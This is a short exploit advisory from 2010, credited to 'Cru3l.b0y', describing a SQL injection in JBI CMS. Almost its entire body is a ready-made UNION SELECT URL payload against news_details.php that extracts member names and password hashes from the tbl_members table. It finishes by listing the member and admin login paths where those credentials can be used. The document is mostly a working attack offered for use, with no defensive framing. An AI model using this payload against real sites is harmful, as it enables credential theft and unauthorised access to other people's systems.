17 lines
No EOL
619 B
Text
17 lines
No EOL
619 B
Text
In The Name Of GOD
|
|
[+] Exploit Title: JBI CMS SQL Injection Vulnerability
|
|
[+] Date: 2010-11-04
|
|
[+] Author : Cru3l.b0y
|
|
[+] Software Link: http://www.jamesblakeinternet.com/london/cms
|
|
[+] Tested on: Ubuntu 10.10
|
|
[+] Contact : Cru3l.b0y@gmail.com
|
|
[+] Website : WwW.PenTesters.IR
|
|
[+] Greeting: Behzad, Ahmad, ...
|
|
|
|
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
|
|
[+] Exploit :
|
|
|
|
http://target/path/news_details.php?id=-1+union+select+1,2,3,group_concat(name,0x3a,password),5,6,7+from+tbl_members
|
|
|
|
Login page for members : /member.php
|
|
Login page for Admins : /admin |